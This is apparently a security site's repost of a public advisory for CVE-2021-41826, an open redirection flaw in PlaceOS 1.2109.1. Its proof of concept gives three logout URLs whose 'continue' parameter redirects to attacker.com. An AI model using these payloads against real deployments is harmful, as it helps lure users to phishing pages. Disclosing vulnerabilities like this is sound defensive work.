Home Tools Exploits & CVE's PlaceOS 1.2109.1 Open Redirection

PlaceOS 1.2109.1 Open Redirection

October 3, 2021

785

PlaceOS version 1.2109.1 suffers from an open redirection vulnerability.

advisories | CVE-2021-41826

# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
# Date: 29-09-2021
# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
# Vendor Homepage: https://place.technology/
# Software Link: https://github.com/PlaceOS
# Version: < 1.29.10
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-41826
#
#
# PoC:  "https://office.example.com/auth/logout?continue=//attacker.com"
#           "https://office.example.com/auth/logout?continue=.attacker.com"
#           "https://office.example.com/auth/logout?continue=:[email protected]"
#
#
# Reference: https://github.com/PlaceOS/auth/issues/36
#                  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
#                  https://nvd.nist.gov/vuln/detail/CVE-2021-41826

PlaceOS 1.2109.1 Open Redirection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Hackers publish fake story about Ukrainians attempting to assassinate Slovak president

FTC commercial surveillance rules could arrive within months, sources say

Laravel Framework 11 Credential Disclosure

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

libMeshb Buffer Overflow

WinRAR Remote Code Execution

Kik Messenger XMPP Stanza Smuggling